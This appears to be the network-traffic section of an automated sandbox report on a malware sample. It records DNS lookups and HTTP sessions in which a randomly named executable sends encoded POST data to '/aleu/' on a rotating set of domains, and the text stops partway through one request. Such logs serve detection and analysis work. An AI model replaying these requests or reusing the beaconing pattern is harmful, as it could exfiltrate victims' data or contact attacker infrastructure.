                                                                                                                                                                                                        May 8, 2024 18:23:34.584978104 CEST4919453192.168.2.41.1.1.1
                                                                                                                                                                                                        May 8, 2024 18:23:34.751023054 CEST53491941.1.1.1192.168.2.4
                                                                                                                                                                                                        May 8, 2024 18:23:42.832598925 CEST5071953192.168.2.41.1.1.1
                                                                                                                                                                                                        May 8, 2024 18:23:43.319794893 CEST53507191.1.1.1192.168.2.4
                                                                                                                                                                                                        May 8, 2024 18:23:58.613964081 CEST6208853192.168.2.41.1.1.1
                                                                                                                                                                                                        May 8, 2024 18:23:58.780273914 CEST53620881.1.1.1192.168.2.4

                                                                                                                                                                                                        DNS Queries

                                                                                                                                                                                                        TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                                                                                                                        May 8, 2024 18:20:40.192984104 CEST192.168.2.41.1.1.10x4e40Standard query (0)www.maxiwalls.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                        May 8, 2024 18:20:56.377676964 CEST192.168.2.41.1.1.10x5500Standard query (0)www.choosejungmann.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                        May 8, 2024 18:21:04.862536907 CEST192.168.2.41.1.1.10x3e1Standard query (0)www.paydayloans3.shopA (IP address)IN (0x0001)false
                                                                                                                                                                                                        May 8, 2024 18:21:19.226341963 CEST192.168.2.41.1.1.10x11a7Standard query (0)www.colchondealquiler.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                        May 8, 2024 18:21:34.627772093 CEST192.168.2.41.1.1.10x1ae3Standard query (0)www.www60270.xyzA (IP address)IN (0x0001)false
                                                                                                                                                                                                        May 8, 2024 18:21:50.893718958 CEST192.168.2.41.1.1.10xd332Standard query (0)www.skibinscy-finanse.plA (IP address)IN (0x0001)false
                                                                                                                                                                                                        May 8, 2024 18:22:07.535444021 CEST192.168.2.41.1.1.10xd03aStandard query (0)www.avoshield.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                        May 8, 2024 18:22:16.482281923 CEST192.168.2.41.1.1.10x267eStandard query (0)www.fairmarty.topA (IP address)IN (0x0001)false
                                                                                                                                                                                                        May 8, 2024 18:22:30.565635920 CEST192.168.2.41.1.1.10xe70eStandard query (0)www.theertyuiergthjk.homesA (IP address)IN (0x0001)false
                                                                                                                                                                                                        May 8, 2024 18:22:35.032275915 CEST192.168.2.41.1.1.10xb9faStandard query (0)www.theertyuiergthjk.homesA (IP address)IN (0x0001)false
                                                                                                                                                                                                        May 8, 2024 18:22:40.206439972 CEST192.168.2.41.1.1.10x5eabStandard query (0)www.aprovapapafox.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                        May 8, 2024 18:22:54.114023924 CEST192.168.2.41.1.1.10x8b8dStandard query (0)www.83634.cnA (IP address)IN (0x0001)false
                                                                                                                                                                                                        May 8, 2024 18:22:55.109824896 CEST192.168.2.41.1.1.10x8b8dStandard query (0)www.83634.cnA (IP address)IN (0x0001)false
                                                                                                                                                                                                        May 8, 2024 18:23:09.600367069 CEST192.168.2.41.1.1.10x2268Standard query (0)www.polhi.lolA (IP address)IN (0x0001)false
                                                                                                                                                                                                        May 8, 2024 18:23:17.863058090 CEST192.168.2.41.1.1.10x33c4Standard query (0)www.valentinaetommaso.itA (IP address)IN (0x0001)false
                                                                                                                                                                                                        May 8, 2024 18:23:18.874846935 CEST192.168.2.41.1.1.10x33c4Standard query (0)www.valentinaetommaso.itA (IP address)IN (0x0001)false
                                                                                                                                                                                                        May 8, 2024 18:23:34.584978104 CEST192.168.2.41.1.1.10xf8a9Standard query (0)www.toyzonetshirts.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                        May 8, 2024 18:23:42.832598925 CEST192.168.2.41.1.1.10xe198Standard query (0)www.solesense.proA (IP address)IN (0x0001)false
                                                                                                                                                                                                        May 8, 2024 18:23:58.613964081 CEST192.168.2.41.1.1.10xe8b8Standard query (0)www.onitsuka-ksa.comA (IP address)IN (0x0001)false

                                                                                                                                                                                                        DNS Answers

                                                                                                                                                                                                        TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                                                                                                                        May 8, 2024 18:20:40.642802000 CEST1.1.1.1192.168.2.40x4e40No error (0)www.maxiwalls.com79.98.25.1A (IP address)IN (0x0001)false
                                                                                                                                                                                                        May 8, 2024 18:20:56.545008898 CEST1.1.1.1192.168.2.40x5500Name error (3)www.choosejungmann.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                        May 8, 2024 18:21:05.035909891 CEST1.1.1.1192.168.2.40x3e1No error (0)www.paydayloans3.shop64.190.62.22A (IP address)IN (0x0001)false
                                                                                                                                                                                                        May 8, 2024 18:21:19.747299910 CEST1.1.1.1192.168.2.40x11a7No error (0)www.colchondealquiler.com217.76.128.34A (IP address)IN (0x0001)false
                                                                                                                                                                                                        May 8, 2024 18:21:35.244816065 CEST1.1.1.1192.168.2.40x1ae3No error (0)www.www60270.xyzfix01.pfw.djamxtvyk.cloudland3.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                        May 8, 2024 18:21:35.244816065 CEST1.1.1.1192.168.2.40x1ae3No error (0)fix01.pfw.djamxtvyk.cloudland3.com13.94.60.40A (IP address)IN (0x0001)false
                                                                                                                                                                                                        May 8, 2024 18:21:51.386219025 CEST1.1.1.1192.168.2.40xd332No error (0)www.skibinscy-finanse.pl178.211.137.59A (IP address)IN (0x0001)false
                                                                                                                                                                                                        May 8, 2024 18:22:07.728657007 CEST1.1.1.1192.168.2.40xd03aName error (3)www.avoshield.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                        May 8, 2024 18:22:16.925327063 CEST1.1.1.1192.168.2.40x267eNo error (0)www.fairmarty.top203.161.46.103A (IP address)IN (0x0001)false
                                                                                                                                                                                                        May 8, 2024 18:22:30.734927893 CEST1.1.1.1192.168.2.40xe70eName error (3)www.theertyuiergthjk.homesnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                        May 8, 2024 18:22:35.199683905 CEST1.1.1.1192.168.2.40xb9faName error (3)www.theertyuiergthjk.homesnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                        May 8, 2024 18:22:40.495079994 CEST1.1.1.1192.168.2.40x5eabNo error (0)www.aprovapapafox.comaprovapapafox.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                        May 8, 2024 18:22:40.495079994 CEST1.1.1.1192.168.2.40x5eabNo error (0)aprovapapafox.com162.240.81.18A (IP address)IN (0x0001)false
                                                                                                                                                                                                        May 8, 2024 18:22:55.266092062 CEST1.1.1.1192.168.2.40x8b8dNo error (0)www.83634.cnsxp92m4v.as22566.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                        May 8, 2024 18:22:55.266092062 CEST1.1.1.1192.168.2.40x8b8dNo error (0)sxp92m4v.as22566.comvf3ba6qx.as22566.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                        May 8, 2024 18:22:55.266092062 CEST1.1.1.1192.168.2.40x8b8dNo error (0)vf3ba6qx.as22566.com103.93.125.69A (IP address)IN (0x0001)false
                                                                                                                                                                                                        May 8, 2024 18:22:55.273056984 CEST1.1.1.1192.168.2.40x8b8dNo error (0)www.83634.cnsxp92m4v.as22566.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                        May 8, 2024 18:22:55.273056984 CEST1.1.1.1192.168.2.40x8b8dNo error (0)sxp92m4v.as22566.comvf3ba6qx.as22566.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                        May 8, 2024 18:22:55.273056984 CEST1.1.1.1192.168.2.40x8b8dNo error (0)vf3ba6qx.as22566.com103.93.125.69A (IP address)IN (0x0001)false
                                                                                                                                                                                                        May 8, 2024 18:23:09.790380001 CEST1.1.1.1192.168.2.40x2268Name error (3)www.polhi.lolnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                        May 8, 2024 18:23:19.283178091 CEST1.1.1.1192.168.2.40x33c4No error (0)www.valentinaetommaso.itmatrimoniovalentinaetommaso.webnode.itCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                        May 8, 2024 18:23:19.283178091 CEST1.1.1.1192.168.2.40x33c4No error (0)matrimoniovalentinaetommaso.webnode.itlb.webnode.ioCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                        May 8, 2024 18:23:19.283178091 CEST1.1.1.1192.168.2.40x33c4No error (0)lb.webnode.io3.73.27.108A (IP address)IN (0x0001)false
                                                                                                                                                                                                        May 8, 2024 18:23:19.283178091 CEST1.1.1.1192.168.2.40x33c4No error (0)lb.webnode.io3.125.172.46A (IP address)IN (0x0001)false
                                                                                                                                                                                                        May 8, 2024 18:23:19.283200026 CEST1.1.1.1192.168.2.40x33c4No error (0)www.valentinaetommaso.itmatrimoniovalentinaetommaso.webnode.itCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                        May 8, 2024 18:23:19.283200026 CEST1.1.1.1192.168.2.40x33c4No error (0)matrimoniovalentinaetommaso.webnode.itlb.webnode.ioCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                        May 8, 2024 18:23:19.283200026 CEST1.1.1.1192.168.2.40x33c4No error (0)lb.webnode.io3.73.27.108A (IP address)IN (0x0001)false
                                                                                                                                                                                                        May 8, 2024 18:23:19.283200026 CEST1.1.1.1192.168.2.40x33c4No error (0)lb.webnode.io3.125.172.46A (IP address)IN (0x0001)false
                                                                                                                                                                                                        May 8, 2024 18:23:34.751023054 CEST1.1.1.1192.168.2.40xf8a9Name error (3)www.toyzonetshirts.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                        May 8, 2024 18:23:43.319794893 CEST1.1.1.1192.168.2.40xe198No error (0)www.solesense.proparkingpage.namecheap.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                        May 8, 2024 18:23:43.319794893 CEST1.1.1.1192.168.2.40xe198No error (0)parkingpage.namecheap.com91.195.240.19A (IP address)IN (0x0001)false
                                                                                                                                                                                                        May 8, 2024 18:23:58.780273914 CEST1.1.1.1192.168.2.40xe8b8Name error (3)www.onitsuka-ksa.comnonenoneA (IP address)IN (0x0001)false

                                                                                                                                                                                                        HTTP Request Dependency Graph

                                                                                                                                                                                                        • www.maxiwalls.com
                                                                                                                                                                                                        • www.paydayloans3.shop
                                                                                                                                                                                                        • www.colchondealquiler.com
                                                                                                                                                                                                        • www.skibinscy-finanse.pl
                                                                                                                                                                                                        • www.fairmarty.top
                                                                                                                                                                                                        • www.aprovapapafox.com
                                                                                                                                                                                                        • www.83634.cn
                                                                                                                                                                                                        • www.valentinaetommaso.it
                                                                                                                                                                                                        • www.solesense.pro

                                                                                                                                                                                                        HTTP Packets

                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                        0192.168.2.44974379.98.25.1804500C:\Program Files (x86)\ZSEZEOIRaEGcNTbypkRykbCSrfKSoUaZhKhKinOATervHyZCBLXrUflUUMoOPVwtq\DfdOmQvPqYXHyvsLVgDsvnqUHhsrOM.exe
                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                        May 8, 2024 18:20:40.991636992 CEST478OUTGET /aleu/?jn4lNb=ok/gmcxpcerYYESV9LVelGsDrZokr4IbVWXcVokfXup7b9fdD39fjj06OXsQXJEXHKhiFziBALjD8i0StjfBb+96LAD/3UXNvlvrkMKLP/jNG9hi36bWzAk=&jvudu=jXz4lVThP2GL4N HTTP/1.1
                                                                                                                                                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                                                                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                        Host: www.maxiwalls.com
                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.157 Safari/537.36
                                                                                                                                                                                                        May 8, 2024 18:20:41.326205015 CEST1289INHTTP/1.1 200 OK
                                                                                                                                                                                                        Date: Wed, 08 May 2024 16:20:41 GMT
                                                                                                                                                                                                        Server: Apache
                                                                                                                                                                                                        Cache-control: max-age=300
                                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                                        Content-Length: 5662
                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                        Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 3e 0d 0a 20 3c 68 65 61 64 3e 0d 0a 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0d 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78 2c 20 6e 6f 66 6f 6c 6c 6f 77 22 3e 0d 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 38 30 30 2c 20 6d 61 78 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 22 3e 0d 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 74 68 65 6d 65 2d 63 6f 6c 6f 72 22 20 63 6f 6e 74 65 6e 74 3d 22 23 30 30 35 63 61 33 22 3e 0d 0a 20 20 3c 6d 65 74 61 20 69 74 65 6d 70 72 6f 70 3d 22 69 6d 61 67 65 22 20 63 6f 6e 74 65 6e 74 3d 22 68 74 74 70 73 3a 2f 2f 61 73 73 65 74 73 2e 69 76 2e 6c 74 2f 69 6d 61 67 65 73 2f 74 68 75 6d 62 6e 61 69 6c [TRUNCATED]
                                                                                                                                                                                                        Data Ascii: <!doctype html><html> <head> <meta http-equiv="content-type" content="text/html; charset=utf-8"> <meta name="robots" content="noindex, nofollow"> <meta name="viewport" content="width=800, maximum-scale=1"> <meta name="theme-color" content="#005ca3"> <meta itemprop="image" content="https://assets.iv.lt/images/thumbnail.png"> <meta property="og:image" content="https://assets.iv.lt/images/thumbnail.png"> <link rel="icon" sizes="96x96" href="https://assets.iv.lt/images/icon.png"> <link rel="apple-touch-icon" href="https://assets.iv.lt/images/icon.png"> <link rel="stylesheet" type="text/css" href="https://assets.iv.lt/default.css"> <title>maxiwalls.com - Uregistruotas domenas - Interneto vizija</title> </head> <body>... begin header --> <table align=center cellpadding=0 cellspacing=0> <tr> <td> <iframe src="https://assets.iv.lt/header.html" width=768 height=100 scrolling=no frameborder=0></iframe> </td> </tr> <tr><td height=2 [TRUNCATED]
                                                                                                                                                                                                        May 8, 2024 18:20:41.326217890 CEST159INData Raw: 0a 20 20 3c 74 61 62 6c 65 20 77 69 64 74 68 3d 37 36 38 20 61 6c 69 67 6e 3d 63 65 6e 74 65 72 20 63 65 6c 6c 70 61 64 64 69 6e 67 3d 30 20 63 65 6c 6c 73 70 61 63 69 6e 67 3d 30 3e 0d 0a 20 20 20 3c 74 72 3e 0d 0a 20 20 20 20 3c 74 64 3e 0d 0a
                                                                                                                                                                                                        Data Ascii: <table width=768 align=center cellpadding=0 cellspacing=0> <tr> <td> <h1>maxiwalls.com</h1> <p> </td> </tr> <tr valign=top
                                                                                                                                                                                                        May 8, 2024 18:20:41.326324940 CEST1289INData Raw: 3e 0d 0a 20 20 20 20 3c 74 64 20 77 69 64 74 68 3d 35 30 38 3e 0d 0a 20 20 20 20 20 44 6f 6d 65 6e 61 73 20 3c 62 3e 6d 61 78 69 77 61 6c 6c 73 2e 63 6f 6d 3c 2f 62 3e 20 73 c4 97 6b 6d 69 6e 67 61 69 20 75 c5 be 72 65 67 69 73 74 72 75 6f 74 61
                                                                                                                                                                                                        Data Ascii: > <td width=508> Domenas <b>maxiwalls.com</b> skmingai uregistruotas Interneto vizijos kliento vardu ir iuo metu yra pilnai aktyvuotas bei paruotas naudojimui. <p> <h2>Norite nukreipti maxiwalls.com?</h2> <
                                                                                                                                                                                                        May 8, 2024 18:20:41.326344013 CEST1289INData Raw: 0d 0a 20 20 20 20 20 20 20 3c 74 68 3e 3c 2f 74 68 3e 0d 0a 20 20 20 20 20 20 20 3c 74 68 3e 50 61 c5 a1 74 75 69 3c 2f 74 68 3e 0d 0a 20 20 20 20 20 20 20 3c 74 68 3e 53 76 65 74 61 69 6e 65 69 3c 2f 74 68 3e 0d 0a 20 20 20 20 20 20 20 3c 74 68
                                                                                                                                                                                                        Data Ascii: <th></th> <th>Patui</th> <th>Svetainei</th> <th>Universalus</th> <th>Didmeninis</th> </tr> <tr align=center> <td align=left>Duomen srautas</td> <td>Neribojama</td>
                                                                                                                                                                                                        May 8, 2024 18:20:41.326358080 CEST1289INData Raw: 2f 74 64 3e 0d 0a 20 20 20 20 20 20 20 3c 74 64 3e 2b 3c 2f 74 64 3e 0d 0a 20 20 20 20 20 20 3c 2f 74 72 3e 0d 0a 20 20 20 20 20 20 3c 74 72 20 61 6c 69 67 6e 3d 63 65 6e 74 65 72 3e 0d 0a 20 20 20 20 20 20 20 3c 74 64 20 61 6c 69 67 6e 3d 6c 65
                                                                                                                                                                                                        Data Ascii: /td> <td>+</td> </tr> <tr align=center> <td align=left>Kaina u mnes</td> <td><b>7.99 EUR</b></td> <td><b>9.99 EUR</b></td> <td><b>14.99 EUR</b></td> <td><b>34.99 EUR</b></td>
                                                                                                                                                                                                        May 8, 2024 18:20:41.326373100 CEST551INData Raw: 2f 22 3e 53 65 72 76 65 72 69 c5 b3 20 6e 75 6f 6d 61 3c 2f 61 3e 0d 0a 20 20 20 20 20 20 3c 6c 69 3e 3c 61 20 74 61 72 67 65 74 3d 5f 74 6f 70 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 69 76 2e 6c 74 2f 73 65 72 74 69 66 69 6b 61
                                                                                                                                                                                                        Data Ascii: /">Serveri nuoma</a> <li><a target=_top href="https://www.iv.lt/sertifikatai/">SSL sertifikatai</a> <li><a target=_top href="https://www.iv.lt/duomenu-centras/">Duomen centras</a> </ul> </td> </tr> </table>


                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                        1192.168.2.44974564.190.62.22804500C:\Program Files (x86)\ZSEZEOIRaEGcNTbypkRykbCSrfKSoUaZhKhKinOATervHyZCBLXrUflUUMoOPVwtq\DfdOmQvPqYXHyvsLVgDsvnqUHhsrOM.exe
                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                        May 8, 2024 18:21:05.352807045 CEST748OUTPOST /aleu/ HTTP/1.1
                                                                                                                                                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                                                                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                        Accept-Encoding: gzip, deflate
                                                                                                                                                                                                        Host: www.paydayloans3.shop
                                                                                                                                                                                                        Origin: http://www.paydayloans3.shop
                                                                                                                                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                        Content-Length: 203
                                                                                                                                                                                                        Cache-Control: max-age=0
                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                        Referer: http://www.paydayloans3.shop/aleu/
                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.157 Safari/537.36
                                                                                                                                                                                                        Data Raw: 6a 6e 34 6c 4e 62 3d 75 56 74 50 54 6a 69 4f 39 6b 59 30 4a 72 62 59 4c 70 74 65 4c 56 6b 63 69 46 55 64 65 54 43 57 66 6e 5a 72 71 72 70 32 34 4e 74 30 66 54 46 47 4e 4c 66 55 64 32 6e 57 4a 56 73 59 37 4c 56 6d 53 59 33 67 32 41 57 4a 33 52 39 2b 45 6e 39 36 50 34 48 4c 77 42 33 4c 32 67 58 70 32 71 48 48 76 70 57 49 6b 52 55 59 51 45 51 70 70 47 2b 42 2f 51 73 47 70 37 79 30 46 57 77 4d 64 4b 68 34 45 2b 50 2b 6a 50 53 36 45 43 66 6c 4c 43 6f 45 35 2b 54 41 47 74 59 65 42 75 35 37 62 79 38 43 59 35 41 78 61 64 66 4d 54 7a 6e 48 31 58 50 64 4d 74 33 36 57 37 32 77 33 63 6c 6b 36 57 45 31 41 67 3d 3d
                                                                                                                                                                                                        Data Ascii: jn4lNb=uVtPTjiO9kY0JrbYLpteLVkciFUdeTCWfnZrqrp24Nt0fTFGNLfUd2nWJVsY7LVmSY3g2AWJ3R9+En96P4HLwB3L2gXp2qHHvpWIkRUYQEQppG+B/QsGp7y0FWwMdKh4E+P+jPS6ECflLCoE5+TAGtYeBu57by8CY5AxadfMTznH1XPdMt36W72w3clk6WE1Ag==
                                                                                                                                                                                                        May 8, 2024 18:21:05.664771080 CEST701INHTTP/1.1 405 Not Allowed
                                                                                                                                                                                                        date: Wed, 08 May 2024 16:21:05 GMT
                                                                                                                                                                                                        content-type: text/html
                                                                                                                                                                                                        content-length: 556
                                                                                                                                                                                                        server: NginX
                                                                                                                                                                                                        connection: close
                                                                                                                                                                                                        Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 [TRUNCATED]
                                                                                                                                                                                                        Data Ascii: <html><head><title>405 Not Allowed</title></head><body><center><h1>405 Not Allowed</h1></center><hr><center>openresty</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                        2192.168.2.44974664.190.62.22804500C:\Program Files (x86)\ZSEZEOIRaEGcNTbypkRykbCSrfKSoUaZhKhKinOATervHyZCBLXrUflUUMoOPVwtq\DfdOmQvPqYXHyvsLVgDsvnqUHhsrOM.exe
                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                        May 8, 2024 18:21:08.194433928 CEST768OUTPOST /aleu/ HTTP/1.1
                                                                                                                                                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                                                                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                        Accept-Encoding: gzip, deflate
                                                                                                                                                                                                        Host: www.paydayloans3.shop
                                                                                                                                                                                                        Origin: http://www.paydayloans3.shop
                                                                                                                                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                        Content-Length: 223
                                                                                                                                                                                                        Cache-Control: max-age=0
                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                        Referer: http://www.paydayloans3.shop/aleu/
                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.157 Safari/537.36
                                                                                                                                                                                                        Data Raw: 6a 6e 34 6c 4e 62 3d 75 56 74 50 54 6a 69 4f 39 6b 59 30 62 36 72 59 4a 4b 56 65 48 6c 6b 66 76 56 55 64 49 6a 43 61 66 6e 6c 72 71 75 5a 6d 34 37 64 30 63 33 42 47 4d 4b 66 55 63 32 6e 57 42 31 74 53 6b 62 56 74 53 59 36 64 32 43 79 4a 33 53 42 2b 45 6c 6c 36 4f 4c 76 4d 78 52 33 7a 39 41 58 52 79 71 48 48 76 70 57 49 6b 52 41 2b 51 45 49 70 70 57 75 42 39 79 49 46 33 72 79 7a 41 6d 77 4d 5a 4b 68 38 45 2b 50 63 6a 4b 4b 63 45 41 6e 6c 4c 48 73 45 35 76 54 44 50 74 59 59 66 65 35 73 64 48 46 33 42 59 70 41 51 64 2f 79 65 68 4c 66 35 78 65 48 64 63 57 74 45 37 53 44 71 62 73 51 33 56 35 38 62 6d 6f 6d 4c 67 4b 66 33 62 79 4e 56 68 41 75 79 5a 56 7a 70 45 55 3d
                                                                                                                                                                                                        Data Ascii: jn4lNb=uVtPTjiO9kY0b6rYJKVeHlkfvVUdIjCafnlrquZm47d0c3BGMKfUc2nWB1tSkbVtSY6d2CyJ3SB+Ell6OLvMxR3z9AXRyqHHvpWIkRA+QEIppWuB9yIF3ryzAmwMZKh8E+PcjKKcEAnlLHsE5vTDPtYYfe5sdHF3BYpAQd/yehLf5xeHdcWtE7SDqbsQ3V58bmomLgKf3byNVhAuyZVzpEU=
                                                                                                                                                                                                        May 8, 2024 18:21:08.507008076 CEST701INHTTP/1.1 405 Not Allowed
                                                                                                                                                                                                        date: Wed, 08 May 2024 16:21:08 GMT
                                                                                                                                                                                                        content-type: text/html
                                                                                                                                                                                                        content-length: 556
                                                                                                                                                                                                        server: NginX
                                                                                                                                                                                                        connection: close
                                                                                                                                                                                                        Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 [TRUNCATED]
                                                                                                                                                                                                        Data Ascii: <html><head><title>405 Not Allowed</title></head><body><center><h1>405 Not Allowed</h1></center><hr><center>openresty</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                        3192.168.2.44974764.190.62.22804500C:\Program Files (x86)\ZSEZEOIRaEGcNTbypkRykbCSrfKSoUaZhKhKinOATervHyZCBLXrUflUUMoOPVwtq\DfdOmQvPqYXHyvsLVgDsvnqUHhsrOM.exe
                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                        May 8, 2024 18:21:11.040277958 CEST10850OUTPOST /aleu/ HTTP/1.1
                                                                                                                                                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                                                                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                        Accept-Encoding: gzip, deflate
                                                                                                                                                                                                        Host: www.paydayloans3.shop
                                                                                                                                                                                                        Origin: http://www.paydayloans3.shop
